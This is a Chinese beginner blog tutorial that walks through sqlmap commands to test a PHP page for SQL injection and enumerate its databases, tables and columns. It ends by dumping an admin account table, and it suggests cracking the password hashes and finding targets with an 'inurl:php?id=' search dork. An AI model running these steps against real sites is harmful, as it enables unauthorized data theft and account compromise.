您的位置 首页 php

简单粗暴,SQL漏洞自动注入

友情提示

初入安全,小白一个,本文重在学习与经验分享!

背景

利用sqlmap工具对存在SQL注入漏洞的Web站点进行SQL注入漏洞的自动注入,爆出用户账号信息。

1. 实验环境

本次实验是对MySQL数据库进行sqlmap工具的自动注入。

靶机 Web URL:

注:查找Web站点的动态页面,即需要到数据库中取数据并将数据返回到web页面的展示的URL进行SQL注入,可以使用搜索引擎搜索”inurl:php?id=”获取动态页面。

2. SQL注入漏洞原理

在动态页面的URL后面输入一些与查询相关的SQL语句(如:条件判断、排序、union联合查询语句),web页面正常显示或者报错显示,说明web页面将你输入的SQL语句没有做任何的处理,直接带入到数据库中进行了select查询并将结果返回给web页面展示,只不过是由于你写的SQL语句正确或者存在错误,导致页面正常显示或者报错显示。

如果出现这种将SQL语句带入到数据库中进行正常查询的情况,基本上就存在SQL注入的漏洞了。

3. sqlmap软件安装与配置

(1)下载sqlmap工具软件

下载地址:

(2)安装python环境

sqlmap工具是基于python语言开发的,所以需要安装python环境才能运行。

下载地址:

# 根据自己系统的实际情况,选择合适的版本下载并按照提示默认安装即可

# 在命令提示符窗口输入”python –version”命令且出现以下提示信息,说明python环境安装成功

(3)安装sqlmap软件

# 将下载下来的sqlmap软件解压到自己喜欢的目录。

# 此时就可以进入到sqlmap程序的主目录运行”python sqlmap.py”命令,如果出现以下提示信息,说明sqlmap工具安装成功。

# 因为每次都进入sqlmap工具主目录执行程序会比较麻烦,为了可以在任意目录执行sqlmap命令,可以将sqlmap目录添加到系统环境变量,这样就只需要打开命令提示符窗口就可以执行sqlmap命令了。

# 添加成功后,重启命令提示符窗口,直接运行”sqlmap.py”命令即可

4. sqlmap工具自动注入过程

(1)判断URL是否存在SQL注入漏洞:

sqlmap命令: sqlmap.py -u “#34;

# 如果存在漏洞,会列出来sql注入漏洞的类型

# 不需要理解此sql注入漏洞的类型原理,有漏洞,那就简单粗暴点,直接用工具爆破

(2)在存在sql注入漏洞的注入点,爆出所有的数据库名

sqlmap命令: sqlmap.py -u “#34; –dbs –batch

# –dbs参数,爆出所有的数据库名

# 加上”–batch”参数,可以不用每次都输入”Y”来同意后续操作,直接自动运行简单粗暴

(3)在爆出所有的数据库名后,再继续爆出某个数据库中所有的表名

sqlmap命令: sqlmap.py -u “#34; -D xycms –tables –batch

# -D 参数指定需要爆的库名,如:本实验数据库名为”xycms”

# –tables 参数,爆出所有的表名

(4)在爆出所有的数据库中的表名后,再继续爆出某张表的列名与列类型

# 找到其中存储用户账户信息的表,再爆列名与列类型

sqlmap命令: sqlmap.py -u “#34; -D xycms -T manage_user –columns –batch

# -T 参数指定需要爆的表名,如:本实验表名为”manage_user”

# –columns 参数,爆出某张表的列名以及列类型

(5)在爆出所有的数据库中的表的列名后,再继续爆出某张表的列内容

# 找到其中存储用户账户信息的表,再爆列内容

sqlmap命令: sqlmap.py -u “#34; -D xycms -T manage_user -C id,m_name,m_pwd –dump –batch

# -C 参数,指定需要爆的某张表的某些列的列名,如:本实验指定列名为id,m_name,m_pwd

# –dump 参数,爆出表的列内容

成功爆出此站点后台管理员的账号信息。其中用户口令是加密的,可以用密码爆破工具解密此密文。如:在线爆破工具:www.cmd5.com、离线爆破工具:john the ripper

3. 安全建议

(1)在动态页面中增加字符替换、特殊字符检查等相关函数,对页面输入的内容进行安全检查。

(2)部署web应用防火墙(WAF)。

文章来源:智云一二三科技

文章标题:简单粗暴,SQL漏洞自动注入

文章地址:https://www.zhihuclub.com/78323.shtml

关于作者: 智云科技

热门文章

网站地图